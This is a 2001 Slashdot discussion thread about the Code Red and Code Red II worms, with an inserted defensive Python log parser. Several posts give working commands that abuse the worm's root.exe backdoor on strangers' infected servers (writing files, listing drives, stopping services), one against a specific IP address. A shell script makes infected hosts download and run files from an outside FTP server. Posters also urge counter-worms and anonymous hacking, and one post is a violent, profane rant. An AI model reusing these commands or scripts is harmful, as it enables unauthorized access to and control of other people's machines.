route delete 0.0.0.0 (the equivalent of) ifconfig eth0 down
and I saw something like 'iisreset /y' go by before..
Intelligent Life on Earth
I guess most of the hits i've taken are more from home users. Only God knows why anyone would need a server OS for personal use.
Good ol' linux!
Would someone post an actual link to this please. Thx -Anne
GET /SarahConnor.ida?XXXXXXXXXXXXXXX...
m00.
the article is available on the Hoovernews website
I actually tried this in Konqueror a couple days ago. Didn't have any immediate results, but somehow www.rob.com managed to set a cookie on my Mandrake8 box, which I readily found out was most likely due to my trying to find CodeRed'ed servers that had hit me. Funny thing is, I never received the popup requesting me to allow the cookie when surfing for his IP, and I have Konq set to Ask Permission for every cookie placing attempt. Weird.
So unless it caused noticeable congestion it makes no difference in that respect.
---
BDOS ERR ON A:>
If you're a nice guy, try the following (or something similar) to let the victim know they're infected:
http://{infected ip here}/scripts/root.exe?/c%20echo%20f>c:\windows\desktop\warning%20you%20have%20the%20code%20red%202%20virus%20your%20computer%20attacked%20mine%20please%20get%20a%20virus%20scanner.txt
When the victim sees something along the lines of "You've got a virus, you attacked me, go clean your system up!" sitting on their *desktop* they'll * NOTICE * it!
If you try to run "delete root.exe" you'll get an access denied..
I stand corrected. I got it to work on a different server. Only one, though; most of the rest I've tried don't seem to have root.exe installed.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
Great, you're making a sound on the newer Code Red variant... What about the old one? I'm still getting about a 4:1 ratio of original code red to anything else... If you don't have a web-server running, but STILL want to log Code Red, use websnarf... A perl implementation to log attempts to access port 80 [ or whatever port you want I guess... ] http://www.unixwiz.net/tools/websnarf.html Yes, it runs under ActivePerl too...
first reply to first post!
And now that whitehouse.gov has installed Linux, the Code Red Worm no longer exists, right? And everybody knows that Distributed Denial of Service attacks don't work against Linux boxes, right?
Mod that sucker back down.
...
What happen??
Someone @Home set us up the worm.
We GET /default.ida?x=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0
What you say?!?
Default.htm turn on.
How are you gentlemen?
All your root.exe are belong to us
Sorry, you're right about that. Different IIS vulnerability (ugh), same sort of backdoor installed.
Either way, someone who finds a wormed IIS should remember to blow away and reinstall the box (instead of just patching IIS and cleaning up the webroot), since either the vulnerability or the backdoor could have installed who-knows-what on it in the meantime...
--
Benjamin Coates
IANAL,BMSI (But my sister is - Stanford Law, at that!)
So I asked her if MS could be sued due to the poor quality of their software, and the millions of dollars spent restoring businesses to normal operations. She said that they absolutely cannot be sued for the resulting conditions based upon misuse of their product. Same goes for any product manufacturers.. gun, automobile, kitchen knives, whatever.
They would have to continue to produce software that was known to contain bugs and major security risks, and here's the key: never release any updates or patches to try to resolve the situation. You have to admit, they've release tons of patches this year alone. They *are* trying to resolve problems as they come up. At least a little bit.
Intelligent Life on Earth
Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines. grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
Were they unconscious, or had they suffocated to death? How would you tell?
I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.
===
The page cannot be displayed
There are too many people accessing the Web site at this time.
---
Please try the following:
Click the Refresh button, or try again later.
Open the 65.29.102.77 home page, and then look for links to the information you want.
HTTP 403.9 - Access Forbidden: Too many users are connected
Internet Information Services
---
Technical Information (for support personnel)
Background:
This error can occur if the Web server is busy and cannot process your request due to heavy traffic.
More information:
Microsoft Support
Yes, the nick is flamebait
Let me get this straight
Some fuckwit with the brains of a monkey and the restraint of a drunken rhino writes a piece of code which can only have a malicious purpose to attack a known and documented flaw in the most common web server out there (one which any competent moron should have sufficiently repaired months ago i should point out) and he is a hero and MS and the government are evil and we should shut them down and etc etc and oh dont forget let's sue microsoft?
I have a better idea - lets find the motherfuckers and i personally will volunteer to cut off their balls with a butter knife - they are pathetic little shits who hide behind their virus and no doubt get huge hardons with it.
These are the sort of people who give us programmers and hackers a bad name - the malicious fuckwits we spend time and energy protecting our networks against - they ARE NOT FUCKING HEROS !!!
Open source needs to wake up and realise that they are never going to do the following.
1. Take over every server in the world - you complain because MS has a monopoly but you would like to see one yourselves - does the term HYPOCRITE mean anything
2. This is not a crusade - no one gives a fuck in the real world and you are never going to bankrupt MS - just make your choice and move on
3. Take over the desktop - users and companies want just the opposite to linux, a standardised and easily controlled and implemented system that is simple to use and secure and rollout - linux offers some of these things but not the important ones and is not user friendly to the home user level - its a great OS for servers and the enthusiast and i love it but it will never be everything to all people.
4. Change the world - its bits and bytes not feeding the poor - you do it to make money or get famous or whatever - get over it - this isnt uni anymore
The fact is this worm is a product designed by cowards to run a DDOS attack against the white house (like that would fucking change anything) and then modified by other cowards to do physical damage to servers and computers - its nothing more than a low act and no different to raping someone in my mind except it is the ultimate hands-off coward act
'yeah this will fuck em' says Nicky the Nerd as he launches the malicious code 'i own em now - im so sexy'
what a wank - what a prick - you lot should be ashamed
Oh and call me a troll - if i posted this under my login BOOM some evangelist with a complex will hit me with a karma stick for having the balls to say something which doesnt agree with the sheep - i thought the whole point of slashdot was to make comments that are different from the norm
If you really want, I have a netcat capture of the worm, I could email it to you and you could infect yourself, just for shits and giggles. But note that the thing trojans your system, so you better have a good clean up procedure.
South Island, but no sorry, try the extreme sports capital of NZ ;) and no we don't get Mountain Dew here. We do however get Dr. Pepper imported from the States so go figure.
**AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
Three more versions surely..
LLLLLL...
IIIII....
and
UUUUUU...
What's that spell!!!
"Information wants to be paid"
I am also on nash1.tn.home.com and since around midnight on 8/6 I have logged around 178 access attempts. I noticed my data light flickering like crazy when I got on the system this morning. Oh well, welcome to the Internet circa 2001.
ummn, I think that in NT you have to change the number to hex meaning instead of 1 you'd use 0x1
I understand that this worm exploits the buffer overflow bug in IIS. Has anybody disassembled the program to understand how it operates. If so, please contact me...
I have determined that if we could insert a payload on a codeRed terminator, we could shut down the infested machine by calling the winAPI function:
This should work, assuming the process has SE_SHUTDOWN_NAME privileges. I don't have IIS, but I am looking at MSDN on a Win2000 machine now.
I would like to understand the payload, it seems like a sequence of unsigned integers. They occur just past the stack, so when the function exits it returns to the inserted code. If we could insert the call to ExitWindowsEx() we would be HOME FREE!
Contact me @ michaeluman@softwaremagic.net
Michael A. Uman
Sr Software Engineer
softwaremagic.net
I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)
Except that the strange HTTP requests it puts out cause problems with some embedded webservers...
Bandwidth gets wasted when it's not utilized. I think you meant to say, "But imagine how much bandwidth Code Red and Sircam have 'utilized' in the last few weeks?"
even better... take it off the net if it gets a dhcp address:
ipconfig /release
Isn't this a grand day, not a bad day? Just think, you now have 530 new shell accounts :) Imagine all the fun you could have.
- sourceforge.com was hacked
- themes.org was hacked
- apache.org was hacked
- the ramen worm
- the lion worm
- the knark rootkit
Things were so bad that Microsoft felt cocky enough to make the claim that open source software has "inherent security risks". Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?
Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.
Mine too has my ADSL modem light up like a christmas tree. Even with my computers unplugged the adsl light keeps flickering. Is there any way to stop this?
Leftist: Force the world into slavery. Liberal: Vote the world into slavery. Libertarian: Let us alone!
You forgot one:
Capitalist: Sell the world into slavery.
Yabbut that's *still* not "all of us," as with SirCam.
Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.
Not that I'm complaining, mind you...
Slashdot's token middle-aged housewife
Magius_AR
It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!
Slashdot 's editors are dickheads
Time the long-awaited "Finger of God" script. Fdisk 'em!
Intelligent Life on Earth
You win the funniest post in thread award. Congratulations, and keep up the good work.
When will somebody modify the worm, so it downloads and installs the patch.. then searches for other vulnerable victims and infects them... ;)
/Geggibus "Ehh..."
I haven't decided whether to start with the tongue-lashing and threats for wasting my time, then to get their attention with the personal details, or to start with the personal details, just to get the freakout reaction.
Hopefully the luser will be too scared to ever start up a Microsoft program ever again.
(Alas, no credit card numbers yet, then I could just pay myself for the time spent on this... :-) )
Some studies indicate that plants feel pain when you cut them. What's next?
'Freedom for Mushrooms'?
All you cruel plant eaters should stop the hurt and pain NOW!
I've been watching my apache logs grow with requests for default.ida?blahblahblah and I had a weird thought last night. CR most likely has some bugs in it. How hard would it be to dissect a copy, find an exploitable buffer overflow, and write a CGI script that counter-attacks CR? I don't think it would be any harder than finding the original default.ida overflow. Or, if it really is making a shell available, why not just have the anti-worm log in and nuke CR?
I like to play children's songs in minor keys.
"We're all sons of bitches now." --J. Robert Oppenheimer
(Copied from the other thread, for those who are working on a way to fix this worm)
:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory /pub/cr
DIR="%2fpub%2fcr"
echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfile+$FTP+%3edlfile%2ecmd | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
What worries me is if this is just the beginning in a wave of attacks.
As everyone notices, it is being directed against the following:
Microsoft users using e-mail.
Microsoft servers on the Internet.
Sircam is annoying to say the least, as it attacks the lack of security on the Windows platform and the lack of knowledge of plenty of Windows users.
Code Red mk1 and mk2 attack the lack of security on IIS (patch is available, MS patches known to cause other issues, we hear it) and then spread like wildfire.
StarTux
PS Microsoft is not very professional in its conduct IMHO. It's not all about money and power, it's about providing the best possible software/service for your customers...
sounds great, but the problem is you would get in so much trouble for that.
-- Powered By Linux
I've always wanted to be able to telnet into my Windows box. Where can i get this virus?
--
Mod up a post Rob doesn't like and you'll never mod again
My employer, a reasonably computer proficient person, got hit by sircam. Cost him 16 hours of productivity during a period when time was particularly valuable...
Change your 'grep XXXXXXXXXXXXXXX' to 'grep default.ida' That way, you can get all the different variants. The 'X's are used by Code Red II, not the initial one.
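The grep-and-mail one-liner a few posts up, and the N-versus-X distinction here, as an added example (not code from any post in this thread): a small Python parser that pulls Code Red probes out of an Apache access log, tells the two variants apart, flags follow-up root.exe/cmd.exe backdoor probes, and lists the source IPs that retried enough times to look like infected hosts. It assumes Apache common/combined log format; the sample lines and the RFC 5737 addresses in them are constructed, not real traffic.

```python
"""Pick Code Red / Code Red II probes out of an Apache access log.

Added example, not from the thread. Same job as 'grep default.ida access_log*',
plus variant labelling and per-source counts suitable for a DShield-style report.
"""
import re
from collections import Counter, defaultdict

# Apache common/combined format; only the client IP, timestamp and request
# path matter here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# default.ida is the .ida ISAPI overflow both worms use; root.exe / cmd.exe in a
# web-reachable path is the backdoor left by Code Red II (and probed for
# earlier by the sadmind/IIS worm).
IDA_RE = re.compile(r'^/default\.ida\?(?P<fill>[NX])', re.IGNORECASE)
BACKDOOR_RE = re.compile(r'/(root|cmd)\.exe(\?|$)', re.IGNORECASE)

# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [04/Aug/2001:23:40:12 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 272
192.0.2.10 - - [04/Aug/2001:23:40:13 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 272
192.0.2.10 - - [04/Aug/2001:23:40:15 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 272
198.51.100.7 - - [06/Aug/2001:00:12:01 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 272
203.0.113.5 - - [06/Aug/2001:01:05:44 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
203.0.113.5 - - [06/Aug/2001:01:05:50 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
192.0.2.44 - - [06/Aug/2001:02:00:00 -0500] "GET /index.html HTTP/1.1" 200 1043
"""


def classify_request(path):
    """Return a label for a suspicious request path, or None if it looks benign."""
    m = IDA_RE.match(path)
    if m:
        # Convention noted in the thread: the original worm pads the query with
        # N's, Code Red II pads it with X's.
        return 'Code Red v1' if m.group('fill').upper() == 'N' else 'Code Red II'
    if path.lower().startswith('/default.ida'):
        return 'Code Red (unknown variant)'
    if BACKDOOR_RE.search(path):
        return 'root.exe/cmd.exe backdoor probe'
    return None


def parse_line(line):
    """Parse one log line; returns (ip, timestamp, path, label) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    label = classify_request(m.group('path'))
    if label is None:
        return None
    return m.group('ip'), m.group('ts'), m.group('path'), label


def summarize(log_text):
    """Count probes per source IP and per variant across a whole log."""
    per_ip = defaultdict(Counter)
    per_variant = Counter()
    for line in log_text.splitlines():
        hit = parse_line(line)
        if hit is None:
            continue
        ip, _ts, _path, label = hit
        per_ip[ip][label] += 1
        per_variant[label] += 1
    return {'per_ip': {ip: dict(c) for ip, c in per_ip.items()},
            'per_variant': dict(per_variant)}


def report_lines(log_text):
    """The raw matching lines, i.e. what 'grep default.ida | mail' would send."""
    return [ln for ln in log_text.splitlines() if parse_line(ln) is not None]


def likely_infected(log_text, min_hits=3):
    """Sources that hit at least min_hits times; the thread observes that an
    infected host tries about three times before moving on, so a lone hit is
    weaker evidence than a burst."""
    per_ip = summarize(log_text)['per_ip']
    return sorted(ip for ip, c in per_ip.items() if sum(c.values()) >= min_hits)


if __name__ == '__main__':
    summary = summarize(SAMPLE_LOG)
    for ip, counts in sorted(summary['per_ip'].items()):
        print(ip, counts)
    print('by variant:', summary['per_variant'])
    print('likely infected:', likely_infected(SAMPLE_LOG))
```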
SirCam spreads in an attached EXE
so would this be an elf binary? if not i doubt it will run on my computer.
-- john
Don't hold your breath. You think a post criticizing MS will get modded up? On slashdot? Yeah right! The MS posse will soon mod it down.
War is necrophilia.
Note the dramatic upsurge a couple hours ago.
If they changed who provides them data, they might want to publish that fact, so one can assess the impact of that on comparisons over time.
If they didn't, well, perhaps they have a small enough number of contributing sites that a drastic change in attack rate at a single site (as is characteristic of CRII) drastically alters their numbers. Again, perhaps they should publish how many sites are contributing, and should note if any one site is providing anomalous data. (Obviously the anomalous data may turn out to be critical early warning, but it's useful to know if a sudden aggregate change is statistically likely to be attributable to a big change at a single site or two.)
If one or two reporting sites are NOT responsible for the upsurge, well, something seems to be afoot...
Just curious about the "highly caffeinated soft-drink" popular among programmers that Code Red was named after. My first guess was Coca-Cola but someone also pointed out that it could be Red Bull. I'll stay with my original guess, due to the red cans and abundance of Coke wherever I see programmers. The only question is whether it qualifies as highly caffeinated. On the other hand, Red Bull has its merit as well, being, well, "Red." However, I do debate whether or not Red Bull is highly popular, since it's expensive as hell, and a lot of the programmers I've met couldn't afford Red Bull on their non-existent salaries. Anyway ... I'd be anxious to hear what insight the slashdot community can give on this matter.
*looks around table* ... i gotta throw away some of these coke cans ;)
damn that reminds me
**AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
What about cable and DSL users? Unless they have static IPs (rare in my part of the world), won't they be using DHCP?
Mind the Gap
Thanks for the advice, Mr. McTeer.
Try this:
http://www.slashdot.org/scritpts/cmd.exe
yeah, that's exactly what i was waiting for... cmd.exe and now I can deploy DDOS to any server i want - list of troopers (win boxes) ready to fuck anything i want are at my fingertips in my apache/access.log. excellent! I won't even blame chinese and M$ for eating my bandwidth...
it doesnt have to be iis, and it doesnt have to be taking control of something. on the other hand, are you willing to bet that it cant be done? how many "secure" ms products (or not even ms products) have flaws like this that appear every once in a while when somebody stumbles across it? too many. code red is achieved within the legal range of values in the protocols involved. without raw sockets, its usually just square pegs in square holes. with raw sockets, you can go into things that cant be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. its like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades. the car wont start, and the atm will reject the card. yes, raw sockets are available to *nix machines, and yes its in w2k, but these things arent widespread among regular people and outside businesses.
Are you pondering what I'm pondering?
I don't care what anyone says, cooking an
animal alive is just fucking sadistic.
I was trying to reach their help site, help.rr.com, and couldn't get through. Bright idea there, guys. proxy.mw.mediaone.net is running interference for now on port 8080, or I wouldn't even be able to reach Slashdot. :P
Ow! My eye! Which one? The one on the floor. ---Action Quake2 exchange, after catching 5 M4 rounds to the head.
Though this assumes that people actually realize they are running a server and look at their error logs. Most of the infected hosts I visited were a) foreign language, and b) the default install page.
well, what i'm thinking that you should actually do is something like: /scripts/root.exe?/c+move+root.exe+c:\winnt\profiles\default\you_got_code_red_you_silly_bastard.exe
ipconfig /release will only work if they are using DHCP. You can do something like "ipconfig /release *" to release all adapters configured by DHCP, but how many of these machines are going to be set up that way? Not that many, I suspect.
Insufficient Internet Security
I noticed this the other night (5th Aug Oz time), when my youngun complained about net speed. Traceroutes to west coast USA from Oz showed that traffic inside Australia was OK, but big congestion stateside (3sec hops !) Inspection of apache logs showed a new variant of the worm in action, and it has not slowed down yet. Anyway, is there a repository somewhere where we can all upload lists of (confirmed) infected IP addresses ? a quick perl script pulls them out of the apache logs. Maybe someone can knock up a service where we can post IP address lists, and have these accumulate into a monster IP list. Then make the IP list available for download. What you do with it after that is up to you. This is really good - hacking made easy, I imagine that there are a lot of newbies who can get started into real hacking because of this useful new feature introduced by Microsoft. This is probably the first (and only) thing that Bill Gates has done to dramatically improve the state of the art in Computer Science. The next generation of users should be better educated because of this. Thanks Bill !
Yeah, but Microsoft would just accuse us of creating viral software to attack their site. :-)
We're sorry, the phone number you have reached is imaginary. Please rotate your phone 90 degrees and try your call again
Another option might be to look for braggarts on IRC and pin them that way. Not good odds though.
Ok I'm the guy. :) I had it removed for a while because I was freaking out how many people were dl my script. But it's back online for all to enjoy and probably make a whole lot better.
but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.
Why not redefine the protocol to where this is the correct and proper response to a codered type connection to port 80?
Some points of clarification for your highness:
Both worms, Code Red, and Code Red II were written by people with much better than monkey brains. They required skill in assembly language, and knowledge of windows and IIS internals.
Code Red II is nothing at all similar to Code Red. The only reason it is called code red II is because the binary contains the text "CodeRedII". The use of the same injection point (the ida exploit) is their only similarity.
Code Red II does not DDoS anything, as I said, CRII is completely different from CR.
One of the interesting side-effects of CodeRed that hasn't been discussed is this: anyone who wants to can now hack other machines with almost complete anonymity.
I've now got a huge list of IP addresses of badly administered machines with a known IIS backdoor. It's highly unlikely that anyone would notice my attempts to hack this machine over the background noise of CodeRed traffic flying around.
In a sense, CodeRed provides a smoke-screen for other hacking attempts, and a 'smoke-signal' to let hackers know where infected servers are.
There has been a major scientific break-in
After all, if they insist on running buggy software (IIS) and don't take the time to install security patches, this is negligent.
1. There is a duty to other internet users not to waste their resource (bandwidth);
2. There has been a breach of this duty (either running IIS or at least not installing patches); and
3. It has caused damage (used up my valuable bandwidth and log disk space).
I think we should all take each IIS server owner to small claims court and extract our few dollars of damages.
That way, it would make more economical sense to run Apache. The server owners will not have to pay for the software or the legal damages that would follow.
Sample Letter of Complaint
Your Name
Address
Date
(Name/Address)
Dear ________________
On (specify date), an attempt was made by your server to infect or otherwise incapacitate my server. As you are responsible for your server, you have a duty to maintain it and take reasonable steps to ensure that it does not cause damage to other computers on the internet. I assert that either by running faulty software, or in the alternative failing to keep security patches installed according to the manufacturer's guidelines, you have breached this duty of care. As a result, your servers caused my administrators to spend unnecessary effort diagnosing bandwidth and security issues and wasted bandwidth belonging to me. I hereby demand the sum of $200 for administrator's time and wasted bandwidth.
Sincerely yours,
Signature
--Send certified mail, return receipt requested.
Most closed source software comes with the same disclaimer.
http:///c/inetpub/scripts/root.exe?/net%20stop%20'World%20Wide%20Web%20Publishing%20Service'
And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.
Enjoy
Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)
-Rob
"It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
Open-source is a little different. It comes with a disclaimer that they're not responsible for anything that goes wrong. When you receive something for free, you can't exactly expect to hold the author liable for any problems.
MS-ware OTOH costs a lot of money, and for that money, people should expect proper operation.
Perhaps software creators should be all held liable, based on the cost of their software: you can sue for 100 times what you paid, for instance.
I would expect the real waste of bandwidth to come not from the infection probes, but from the virus trying to send junk to target websites, such as the first Code Red did try to whitehouse.gov.
~
Tsunami -- You can't bring a good wave down!
Timothy 1:2
Hemos 1:3
Michael 1:4
Cowboyneal 1:100000000000000
ladies and gentlemen,
there is still time to place your bets...
Oh, and don't forget to tack a '| uniq' there :)
Under windows98 *dies* my firewall reports something like 50 http port probes per minute (avg). The IPs logged show that all sorts of machines are probing (isp proxies, local machines (same subnet), distant machines from all over the world). I use Noos as isp (France).
This is a me too -- my firewall logs are filling up with DENY's on port 80, ever since last night.
Out of curiosity I've tried loading web pages from a number of the ip addresses in my logs and it seems that a lot of people on @home really hate us US government!
I have a great link on this topic:
http://slashdot.org/article.pl?sid=01/08/05/0433219&mode=thread
only hits Outlook users, not every email user? Are you telling me BeMail and Kmail are vulnerable. Ok, and Pegasus...
They cannot be infected, but they have to cope with the stream of files dumped on them by Sircam - getting several 100Kbytes daily here, worst hit was 11 Mbytes
I too am with @Home and have been seeing large amounts of info flow into my cable modem. I am running a Masqueraded Linux box to connect my LAN to the Net - and it has been eating up all the packets - but I can't find a way to log them at all. I suspect that someone on my cable loop is probably infected with CodeRed and I am seeing all of the outgoing packets but I have no real way to tell. Does anyone know of a good way to save these packets from the bit-bucket so that we can find out who is sending them?? I really don't like the way my cable modem is flashing - it just bothers me.
http://66.25.153.130/scripts/root.exe?/c+dir+c:\
how much bandwidth has Windows wasted in the past few years...
Shift happens. Fire it up.
there are still alternatives out there, might as well get a copy before MS devours them too.
We need to push for a Lemon law for software. I think it is time folks. MS's license ensures one cannot hold them responsible for their incompetence, or if you read I. Cringely this week, their planned mediocracy.
And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...
Suing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.
No kidding. My cable modem data light blinks non-stop now. Fortunately, the router is blocking anything to port 80. But from the way data is pouring in, i would figure it to be several scans per minute to my cable modem.
the Sadmind/IIS unicode worm already did the copy-cmd.exe-to-the-scripts-directory thing. CodeRed uses the same vulnerability, just attaches a different payload than changing your index.html to "f--- usa!", etc.
Kiddies were already scanning around for /scripts/root.exe and using it to set up those lovely little DoS scripts...
--
Benjamin Coates
some grepping and word counting revealed about 606 hits as of about 5:00 CDT last night. my first attack was at Aug 3 at 23:40 CDT. i don't think the activity light on my cable modem has stopped blinking yet. each computer attempts to infect three times before it gives up & moves on.
:) but my connection sucks now because of all the morons that didn't patch themselves up after the first time it went around.
what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support. (if you read GRC stuff then this is old news) script kiddies everywhere, and more attacks can be made that were previously impossible or at the least difficult to accomplish. yes its true that this started in w2k, but does everybody actually have w2k? nope. they're really gonna push XP though, unlike any of the upgrades past 95.
then again maybe everyone does have it, seeing how many attacks i'm getting. the most aggravating thing about this is that all of the attacks just bounce off me (proudly microsoft free
Are you pondering what I'm pondering?
Didn't say it was a good idea. I just said it could happen. I'm sure MS would love it, because it would destroy Linux.
I also have an @home account with a Linux firewall. run iptraf and take a look at the arp requests. I am averaging hundreds a second, with the occasional port 80 hit. in the last hour or so I have logged about 50 hits to port 80.
:0 BD
* > 100000
* o8OkQ6SDmDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
/dev/null
By design, it's a very bad idea to make your trojan/virus do anything too shocking.
Ever boiled a frog? If you throw a frog in hot water, it'll jump out. If you slowly turn up the heat, it'll roast.
This sort of violent behaviour in a virus stops it from being able to live with its host, because it gets detected way too fast. A worm/virus/trojan that has too great a consequence on its host will be wiped out too soon, and in the case of the worm, this means lesser propagation.
<\Devil's advocate>
Think about what CRII is going to do for the zero day lists!! Hey.. how about a gnutella hack that automatically accepts uploads and shares 'em right back out??
Intelligent Life on Earth
I'm surprised that there is still nothing on .
Last update on code red and sircam frenetically avoided the word 'microsoft' (/internet/ worm, /e-mail/ virus). Wonder what the MS PR spin will be on the next one...
....this one.
I have to live with it being on the biggest "script kiddie" network on earth (ATT Broadband). I'm getting approximately 3000 HTTP port probes against my machine an hour (without a webserver). If i reboot my windows machine, it takes me 30 minutes to get a DHCP address due to the fact that the DHCP server is hosed.
DoS attack against the Whitehouse? I don't think so, how about a DoS attack against everyone? I can't even get to servers in Italy.
Yes, my girlfriend is a BitchX
I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.
It's depressing, really.
-Rob
Or just plain simple?
Just type the following into a browser using one of the infected systems from your log file:
http://infected_system/scripts/root.exe?/c+dir+c:\
You are greeted with a directory listing of the root of C:\!
I just LOVE windows!
This is going to get MUCH worse!
Forgive me for the karma whoring, but all I did was scroll down my SlashDot homepage to see that Timothy already posted an article about Code Red II.
Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syrup, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which aren't windows machines. I guess linux is like the caffeine of all soda. The good parts :-)
"If a man watches 3 football games in a row he should be declared legally dead" - A
isomerica.net | Foonetic IRC
A friend of mine is a cable modem user who got infected. He said on or about the 1st, his cable modem light suddenly became maxed out. He's usually good with his system administration, but he recently switched back from RH to Win2k server. He checked and checked and found out that some Windows Media Server had been installed and was running its own copy of IIS, which had been infected.
The next day he installed Apache Win32.
Intelligent Life on Earth
I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.
:-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.
What will happen? I don't know, but here are some possibilities:
Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.
Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.
Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.
Internet Collapses. I really doubt it, I just had to say it to satisfy Cringely
So, which will it be, folks? This would make a great SlashPoll.
please. posting another story like this is almost as big a waste of bandwidth as the worm.
please reference previous stories: http://slashdot.org/article.pl?sid=01/08/05/0433219.
I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?
:)
I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?
Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that?
heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.
Geeky modern art T-shirts
To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310
